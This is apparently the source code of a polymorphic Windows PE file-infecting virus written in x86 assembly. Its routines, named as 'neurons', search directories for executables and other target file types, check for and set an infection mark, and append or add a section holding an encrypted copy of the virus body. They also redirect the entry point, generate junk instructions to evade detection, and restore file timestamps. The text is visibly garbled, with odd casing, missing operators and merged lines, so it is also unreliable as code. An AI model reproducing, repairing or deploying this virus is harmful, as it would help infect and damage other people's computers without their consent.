; ------------------------------------------------- ------------------------------
NEURON_CHECKFILE PROC PASCAL DELTA_PARAM: DWORD; D-OFFSET As Dendrit
n_checkfile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
MOV [EBX NCHECKFILE_OK], 0
TEST [EBX WFD.WFD_DWFILEATTRIBUTES], FILE_ATTRIBUTE_DIRECTORY
JNE END_CHECKFILE; Discard Directories
XOR EDX, EDX
MOV ECX, [EBX WFD.WFD_NFILESIZEHIGH] CMP ECX, EDX
Jne End_Checkfile; Discard Hue Files
Add dx, 4096
CMP [EBX WFD.WFD_NFILESZELOW], EDX
JB end_checkfile; Discard Small Files
MOV [EBX NOPENFILE_SIZE], ECX; Dendrit
MOV [EBX NOF_SYNAPSE], OFFSET PFNEURON_CHECKFILE; Build Synapse
Push [EBX PFNEURON_OPENFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
MOV ECX, [EBX LPFILE]
JECXZ END_CHECKFILE; MAPPED FAILED?
MOV DL, BYTE PTR [ECX.MZ_RES2]
TEST DL, DL
Jne End_Check_close; test "already infected" Mark
MOV EDX, ECX
CMP Word PTR [ECX], Image_DOS_SIGNATURE; MUST BE MZ
JNE END_CHECK_CLOSE
MOV ECX, [ECX.MZ_LFANEW]
JECXZ END_CHECK_CLOSE
MOV EAX, [EBX WFD.WFD_NFILESZELOW]
CMP EAX, ECX
JB end_check_close; Must Point Inside File
Add ECX, EDX
CMP DWORD PTR [ECX], Image_NT_SIGNATURE; MUST BE PE / 0/0
JNE END_CHECK_CLOSE
CMP Word PTR [ECX.NT_FILEHEADER.FH_MACHINE], image_file_machine_i386
JNE END_CHECK_CLOSE; MUST BE 386
Test byte PTR [ECX.NT_FILEHEADER.FH_CHARACTERISTICS], Image_FILE_EXECUTABLE_IMAGE
JE end_check_close
CMP [ECX.NT_OPTIONALHEADER.OH_IMAGEBASE], 400000H; Must Be 0x400000
JNE END_CHECK_CLOSE
XOR EAX, EAX
INC EAX
MOV [EBX NCHECKFILE_OK], Al; Axon
End_check_close:
CDQ
Inc EDX
Inc EDX
MOV [EBX NCLOSEFILE_MODE], DL; Dendrit
MOV [EBX NCLF_SYNAPSE], OFFSET PFNEURON_CHECKFILE
Push [EBX PFNEURON_CLOSEFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
END_CHECKFILE:
Push [EBX DWTHREADID]
NCF_SYNAPSE = DWORD PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Jump to Previous Neuron
Popad
JMP n_checkfile
NEURON_CHECKFILE ENDP
; ------------------------------------------------- ------------------------------ Neuron_openfile Proc Pascal Delta_Param: DWORD; DELTA Offset As Dendrit
n_openfile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
Lea ESI, [EBX WFD.WFD_SZFILENAME]
Mov EDI, 0
Nopenfile_size = DWORD PTR $ - 4; Dendrit
XOR EAX, EAX
MOV [EBX LPFILE], EAX
Push EAX
Push EAX
Push Open_EXISTING
Push EAX
MOV Al, 1
Push EAX
Ror Eax, 1
MOV ECX, EDI
JECXZ $ 4
RCR EAX, 1
Push EAX
PUSH ESI
Call [EBX DDCREATEFILEA]; OPEN FILE
INC EAX
JE end_openfile
Dec EAX
MOV [EBX HFILE], EAX
CDQ
Push Edx
Push EDI
Push Edx
Mov DL, Page_Readonly
Test EDI, EDI
JE $ 4
SHL DL, 1
Push Edx
PUSH 0
Push EAX
Call [EBX DDCREATEFILEMAPPINGA]; CREATE MAPPIN OBJECT
Test Eax, EAX
JE end_openfile2
MOV [EBX HMAPFILE], EAX
CDQ
Push EDI
Push Edx
Push Edx
MOV DL, FILE_MAP_READ
Test EDI, EDI
JE $ 4
SHR DL, 1
Push Edx
Push EAX
Call [EBX DDMAPVIEWOFFILE]; MAP View of File
MOV [EBX LPFILE], EAX
Test Eax, EAX
Jne End_openfile
END_OPENFILE3:
INC EAX
END_OPENFILE2:
MOV [EBX NCLOSEFILE_MODE], AL; AXON
Mov Eax, [NOF_SYNAPSE]
MOV [EBX NCLF_SYNAPSE], EAX; Dendrit
Push [EBX PFNEURON_CLOSEFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
END_OPENFILE:
Push [EBX DWTHREADID]
NOF_SYNAPSE = DWORD PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Switch to Previous Neuron
Popad
JMP n_openfile
NEURON_OPENFILE ENDP
; ------------------------------------------------- ------------------------------
NEURON_CLOSEFILE PROC PASCAL DELTA_PARAM: DWORD
Delta Offset As Dendrit
n_closefile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store delta Offsetmov ESI, [EBX HFILE]
XOR EDI, EDI
XOR ECX, ECX
MOV CL, 0
nclosefile_mode = byte PTR $ - 1; Dendrit
Jecxz closefile
CMP CL, 1
Je Closemap
CMP CL, 2
JE unmapfile
CMP Al, 3
Je next_edi
Inc EDI
Next_edi:
Inc EDI
Unmapfile:
Push [EBX LPFILE]
Call [EBX DDUNMAPVIEWOFFILE]; Unmap View Of File
Closemap:
Push [EBX HMAPFile]
Call [EBX DDCLOSEHANDLE]; Close Mappin Object
Test EDI, EDI
JE Closefile
CMP EDI, 1
JE set_time
XOR EAX, EAX
Push EAX
Push EAX
Push [EBX WFD.WFD_NFILESZELOW]
PUSH ESI
Call [EBX DDSETFILEPOINTER]; Set File Pointer API
PUSH ESI
Call [EBX DDSETENDOFFILE]; SET EOF
Set_time:
Lea Eax, [EBX WFD.WFD_FTLASTWRITETIME]
Push EAX
Lea Eax, [EBX WFD.WFD_FTLASTACCESSTIME]
Push EAX
Lea Eax, [EBX WFD.WFD_FTCREATIONTIME]
Push EAX
PUSH ESI
Call [EBX DDSETFILETIME]; Set Back File Time
Closefile:
Push [EBX HFILE]
Call [EBX DDCLOSEHANDLE]; Close File
Push [EBX DWTHREADID]
NCLF_SYNAPSE = DWORD PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Jump to Previous Neuron
Popad
JMP n_closefile
NEURON_CLOSEFILE ENDP
; ------------------------------------------------- ------------------------------
NEURON_INFECTFILE PROC PASCAL DELTA_PARAM: DWORD
Delta Offset As Dendrit
n_infectfile:
Pushhad; Store All Regs
Mov EBX, Delta_Param; Store Delta Offset
@Seh_setupframe; setup SEH FRAME
XOR ESI, ESI
PUSH ESI
Lea Edi, [EBX WFD.WFD_SZFILENAME]
Push EDI
Call [EBX DDSETFILEATTRIBUTESA]; Blank File Attributes
Test Eax, EAX
JE END_INFECTFILE
MOV EAX, [EBX WFD.WFD_NFILESZELOW]
Sub Eax, Start - Virus_end
MOV [EBX NOPENFILE_SIZE], EAX; DendritMov [EBX NOF_SYNAPSE], OFFSET PFNEURON_INFECTFILE; SYNAPSE
Push [EBX PFNEURON_OPENFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
MOV ECX, [EBX LPFILE]
Test ECX, ECX
JE ERR_INFECTFILE
Lea Eax, [EBX SZGETMODULEHANDLEA]
Lea Edx, [EBX SZKERNEL32]
Call getProcadDressit; imports getModuleHandlea?
Test Eax, EAX
JNE Store
Lea Eax, [EBX SZGETMODULEHANDLEW]; NOPE, MUST IMPORT Unicode
Call getProcaddressit; Version of That
Test Eax, EAX
JE ERR_INFECTFILE
MOV [EBX GMHW], EAX
XOR EAX, EAX
STORE: MOV [EBX GMHA], EAX
Push ECX
Add ECX, [ECX.MZ_LFANEW]
MOV EDX, ECX
x = image_sizeof_section_header
Movzx ESI, Word Ptr [Edx.nt_FileHeader.fh_sizeOfoptionalHeader]
Lea ESI, [EDX.NT_OPTIONALHEADER ESI]
Movzx eax, word ptr [edx.nt_fileHeader.fh_numberofsections]]
Test Eax, EAX
JE ERR_INFECTFILE
Imul Eax, X
Add ESI, ESI
IN Al, 40h; Select How To Infect File
And Al, 2
Je nextwayofinfection
Push [ESI.SH_SIZEOFRAWDATA - X]
Lea Edi, [ESI.SH_VIRTUALSIZE - X]
Sub DWORD PTR [EDI], START - Virtual_END; New Virtual Size
MOV EAX, [EDI]
Push Edx
MOV ECX, [edx.nt_optionalheader.oh_filealignment]
CDQ
Div ECX
INC EAX
Mul ECX
MOV [ESI.SH_SIZEOFRAWDATA - X], Eax; New SizeofrawData
MOV ECX, EAX
POP EDX
Mov Eax, [EBX EntryPoint]
Push [edx.nt_optionalheader.oh_addressofentrypoint]
POP [EBX ENTRYPOINT]
POP EDI
Push EAX
SUB ECX, EDI
Add [edx.nt_optionalheader.oh_sizeofimage], ECX; New SizeOfImage
OR [ESI.SH_CHARACTERISTICS.HIW.HIB - X], 0E0H; Change Flags
Mov Eax, [ESI.SH_POINTERTORAWDATA - X]
Add Eax, EDI
MOV ECX, [EBX WFD.WFD_NFILESZELOW]
Add Edi, ECX
Sub EDI, EAX
Mov ESI, [ESI.SH_VIRTUALADDRESS - X] Add ESI, EDI
MOV [edx.nt_optionalheader.oh_addressofentryPoint], ESI; New EP
POP EAX
Copy_virus:
POP EDI
MOV BYTE PTR [EDI.MZ_RES2], 1; SET "already infected" Mark
Add Edi, ECX
Pushad; Poly Engine Starts Here ...
Rep_1: Call get_reg; load random register
MOV DL, Al
Add Al, 58H; Create Pop Reg
MOV BYTE PTR [EBX @ 1], Al; Store IT
Lea EDI, [EBX @ 2 1]; and APLY Registry Changes
Call Mask_it; To All Needed
Lea EDI, [EBX @ 3]; instructions
Call mask_it; ...
REP_2: Call get_reg; get random register
CMP Al, DL; Mustnt Be Previous Register
JE rep_2
MOV DH, Al
XCHG DL, DH
Add Al, 0B8H; CREATE MOV INSTRUCTION
MOV BYTE PTR [EBX @ 4], Al; Store IT
Lea EDI, [EBX @ 5]; and APLY Changes
Call mask_it
Push EAX
IN Al, 40h
And Al, 1
JE _TEST_
MOV Al, 0BH; or REG, REG
JMP _WRITE
_Test_: MOV Al, 85H; Test Reg, REG
_WRITE: MOV BYTE PTR [EBX @ 6-1], Al; Store IT
POP EAX
Lea Edi, [EBX @ 6]
MOV Al, [EDI]
And Al, 11000000B
Add Al, DL
Ror Al, 3
Add Al, DL
ROL Al, 3
Stosb
REP_3: Call get_reg; get random register
CMP Al, DL; Mustnt Be Previous Register
JE rep_3
CMP Al, DH
JE rep_3
CMP Al, 101b; Mustnt Be EBP
JE Rep_3; (Due to INSTR. Incompatibility)
MOV DL, Al
Lea EDI, [EBX @ 3]
MOV Al, [EDI]
And Al, 11000111B
Ror Al, 3
Add Al, DL
ROL Al, 3
Stosb
Lea EDI, [EBX @ 7]
Call mask_it
Lea Edi, [EBX @ 8]
Call mask_it
LEA ESI, [EBX JUNX]
GEN_J: LODSD; JUNK INSTRUCTIONS generator
XCHG EAX, ECX
JECXZ END_MUTATE
Mov Edi, ECX
Add Edi, EBX
XOR EAX, EAX
IN Al, 40h
And Al, 1
JE _2 & 1_
PUSH ESI
LEA ESI, [EBX JUNX3]
IN Al, 40h
And Al, Num_Junx3-1Add ESI, EAX
Movsb
Movsb
IN Al, 40h
Stosb
JMP _gen_j
_2 & 1_: Push ESI
IN Al, 40h
And Al, 1
JE Twofirst
Call one_byte
Call TWO_BYTE
JMP _gen_j
TWOFIRST:
Call TWO_BYTE
Call one_byte
_Gen_J: POP ESI
JMP Gen_J
END_MUTATE:
Popad
Push EAX
In Al, 40h; Create 32bit Key
MOV AH, Al
IN Al, 40h
SHL EAX, 16
IN Al, 40h
MOV AH, Al
IN Al, 40h
MOV DWORD PTR [EBX Key], EAX; Store IT
Push EDI
MOV EDX, (Virus_end-Start 3) / 4; Copy Virus Body To INTERNAL
Lea ESI, [EBX START]; BUFFER
MOV ECX, EDX
Lea EDI, [EBX Buffer]
REP MOVSD
XOR ECX, ECX
Lea ESI, [EBX BUFFER - START Encrypted]
Crypt: xor [ESI], EAX; Encrypt Virus Body
Add ESI, 4
Inc ECX
CMP ECX, (Virus_end-Encrypted 3) / 4
JNE CRYPT
POP EDI
POP EAX
Lea ESI, [EBX BUFFER]
MOV ECX, EDX
INC DWORD PTR [EBX GenerationCount]; Increment Generation Count
Rep Movsd; COPY VIRUS
MOV [EBX ENTRYPOINT], EAX; Restore VariableAfter
MOV Al, 3; Copy Stage
JMP IF_n
Err_INFECTFILE:
MOV Al, 4
MOV [EBX NCLOSEFILE_MODE], AL; Dendrit
IF_N: MOV [EBX NCLF_SYNAPSE], Offset Pfneuron_infectFile; Synapse
Push [EBX PFNEURON_CLOSEFILE]
Call [EBX DDSWITCHTOFIBER]; Switch to Neuron
End_infectfile:
Push [EBX WFD.WFD_DWFILEATTRIBUTES]]
Lea ESI, [EBX WFD.WFD_SZFILENAME]
PUSH ESI
Call [EBX DDSETFILEATTRIBUTESA]; SET Back File Attributes
END_IF: Push [EBX DWTHREADID]
Nif_synapse = dWord PTR $ - 4
Call [EBX DDSWITCHTOFIBER]; Jump to Previous Neuron
JMP N_INFECTFILE
Nextwayofinfection:; Create New Section
MOV EDI, EDX
Inc Word Ptr [edi.nt_fileheader.fh_numberofsections]
Mov Eax, [ESI.SH_VIRTUALADDRESS - X]
Add Eax, [ESI.SH_VIRTUALSIZE - X] MOV ECX, [Edi.nt_OptionalHeader.oh_sectionalignment]
CDQ
Div ECX
Test EDX, EDX
JE next_1
INC EAX
Next_1: MUL ECX
MOV [EBX S_RVA], EAX; New RVA
MOV ECX, [EBX EntryPoint]
Push ECX
Push [edi.nt_optionalheader.oh_addressofentrypoint]
POP [EBX ENTRYPOINT]
MOV [edi.nt_optionalheader.oh_addressofentryPoint], EAX; New EP
MOV ECX, [edi.nt_optionalheader.oh_filealignment]
MOV EAX, Virtual_END - START
Div ECX
INC EAX
Mul ECX
MOV [EBX S_RAWSIZE], EAX; New SizeOfrawData
Add [edi.nt_optionalheader.oh_sizeofimage], EAX
New SizeOfImageBase
MOV ECX, [EBX WFD.WFD_NFILESZELOW]
MOV [EBX S_RAWPTR], ECX; New PointertorawData
Push ECX
Mov EDI, ESI
Lea ESI, [EBX New_SECTION]
MOV ECX, (image_sizeof_section_header 3) / 4
Rep Movsd; Copy Section
POP ECX
POP EAX
JMP COPY_VIRUS; and COPY VIRUS BODY
Ni_seh: @seh_removeframe; Remove SEH FRAME
Popad
JMP END_IF
NEURON_INFECTFILE ENDP
; ------------------------------------------------- ------------------------------
One_byte:
Lea ESI, [EBX JUNX1]
IN Al, 40h
And Al, Num_Junx1-1
Add ESI, ESI
Movsb
RET
TWO_BYTE:
Lea ESI, [EBX JUNX2]
IN Al, 40h
And Al, Num_Junx2-1
Add ESI, ESI
Movsb
IN Al, 40h
And Al, 7
Add Al, 11000000B
Stosb
RET
GET_REG:
IN Al, 40h
And Al, 7
JE get_reg
CMP AL, 4
JE get_reg
RET
Mask_it:
MOV Al, [EDI]
And Al, 11111000B
Add Al, DL
Stosb
RET
; ------------------------------------------------- ------------------------------
NEURON_ADDRESSES: DD Offset Neuron_main
DD offset neuron_debugger
DD offset neuron_findfile
DD Offset Neuron_checkfile
DD offset neuron_openfile
DD Offset Neuron_Closefile
DD Offset Neuron_infectfile
Num_of_neurons = (Byte Ptr $ - Offset Neuron_addresses / 4JUNX1: NOP
Dec EAX
CMC
INC EAX
CLC
CWDE
STC
Lahf
Num_junx1 = 8
Junx2: DB 8bh; MOV ..., ...
DB 03H; Add ..., ...
DB 13h; adc ..., ...
DB 2DH; SUB ..., ...
DB 1bh; sbb ..., ...
DB 0bh; or ..., ...
DB 33h; xor ..., ...
DB 23h; and ..., ..., ...
DB 33h; test ..., ...
Num_junx2 = 9
Junx3: DB 0C1H, 0C0H; ROL Eax, ...
DB 0C1H, 0E0H; SHL EAX, ...
DB 0C1H, 0C8H; Ror Eax, ...
DB 0C1H, 0E8H; SHR EAX, ...
DB 0C1H, 0D0H; RCL EAX, ...
DB 0C1H, 0F8H; Sar Eax, ...
DB 0C1H, 0D8H; RCR EAX, ...
Num_junx3 = 7
Junx: IRP NUM, <1, 2, 3, 4, 5, 6, 7, 8, 9>
DD Offset @ J & Num
ENDM
DD 0
GenerationCount DD?
EntryPoint DD Offset EXIXTPROCESS - 400000H
Szexe DB '* .exe', 0
SZSCR DB '* .SCR', 0
SZBAK DB '* .bak', 0
SZDAT DB '* .dat', 0
SZSFX DB '* .sfx', 0
NUM_OF_EXTS = 5
Dotdot DB '..', 0
DTAVTBAV DB 'Anti-vir.dat', 0
String_subs:; String Substitutes
DB 'File', 0
DB 'get', 0
DB 'SET', 0
DB 'Module', 0
DB 'Handle', 0
DB 'Create', 0
DB 'Find', 0
DB 'close', 0
DB 'ViewOf', 0
DB 'CurrentDirectorya', 0
DB 'Fiber', 0
DB 'Thread', 0
DB 'delete', 0
DB 'Library', 0
NEW_SECTION:
S_name db '.mdata', 0, 0
S_VSIZE DD VIRTUAL_END - START
S_RVA DD 0
S_Rawsize DD 0
S_Rawptr DD 0
DD 0, 0, 0
S_Flags DD 0e0000000H
Virus_end:
Strings:
SZKERNEL32 DB 'KERNEL32', 0
Szkernel32w dw 'k', 'e', 'r', 'n', 'e', 'L', '3', '2', 0
Szuser32 DB 'USER32', 0
SzgetModuleHandlea DB 'getModuleHandlea', 0SZgetModuleHandlew DB 'getModuleHandlew', 0
Szapis:
SzcreateThread DB 'CreateThread', 0
SzwaitforsingleObject DB 'WaitforsingleObject', 0
SzcloseHandle DB 'CloseHandle', 0
SZConvertthreadTofiber DB 'ConvertThreadTofiber', 0
SzcreateFiber DB 'CreateFiber', 0
Szswitchtofiber DB 'Switchtofiber', 0
SZDELETEFIBER DB 'DELETEFIBER', 0
SZGETVERSION DB 'GETVERSION', 0
SZFindFirstFilea DB 'Findfirstfilea', 0
SZFINDNEXTFILEA DB 'FINDNEXTFILEA', 0
SZFindClose DB 'FindClose', 0
SzcreateFilea DB 'CreateFilea', 0
SzcreateFilemappinga DB 'CreateFilemappinga', 0
SzmapViewoffile DB 'MapViewOffile', 0
SzunmapViewoffile db 'unmapviewoffile', 0
SzsetFileAttributesa DB 'setFileAttributesa', 0
SZSetFilePointer DB 'setFilePointer', 0
SZSETENDOFFILE DB 'STENDOFFILE', 0
SZSETFILETIME DB 'SETFILETIME', 0
SzgetCurrentDirectorya DB 'getcurrentdirectorya', 0
SzsetCurrentDirectorya DB 'setcurrentdirectorya', 0
SZDELETEFILEA DB 'Deletefilea', 0
SzloadLibrarya DB 'LoadLibrarya', 0
SZFREELIBRARYA DB 'FREELIBRARY', 0
SZISDEBUGERPRESENT DB 'IsDebuggerPresent', 0
DB 0FFH
DDAPIS:
DDCREATTHREAD DD?
DDWAITFORSINGLEOBJECT DD?
DDCLOSEHANDLE DD?
DDCONVERTTHREADTOFIBER DD?
DDCREATEFIBER DD?
DDSWITCHTOFIBER DD?
DDDELETEFIBER DD?
DDGETVERSION DD?
DDFINDFIRSTFILEA DD?
DDFINDNEXTFILEA DD?
DDFINDCLOSE DD?
DDCREATEFILEA DD?
DDCREATEFILEMAPPINGA DD?
DDMAPVIEWOFFILE DD?
DDUNMAPVIEWOFFILE DD?
DDSETFILEATTRIBUTESA DD?
DDSETFILEPOINTER DD?
DDSETENDOFFILE DD? DDSETFILETIME DD?
DDGETCURRENTDIRECTORYA DD?
DDSETCURRENTDIRECTORYA DD?
DDDDELETEFILEA DD?
DDLOADLIBRARYA DD?
DDFREELIBRARYA DD?
DDISDEBUGGERPRESENT DD?
DWTHREADID DD?
Fiber_Addresses:
PFMAIN DD?
PFNEURON_MAIN DD?
PFNEURON_DEBUGGER DD?
PFNEURON_FINDFILE DD?
PFNEURON_CHECKFILE DD?
PFNEURON_OPENFILE DD?
PFNEURON_CLOSEFILE DD?
PFNEURON_INFECTFILE DD?
HFILE DD?
HMAPFILE DD?
LPFILE DD?
SearchHandle DD?
Curdir DB MAX_PATH DUP (?)
WFD WIN32_FIND_DATA?
Buffer DB Virus_END - START 1 DUP (?)
Virtual_end:
_GetModuleHandlea DD Offset getModuleHandlea
_GetModuleHandlew DD Offset getModuleHandlew
ENDS
End Start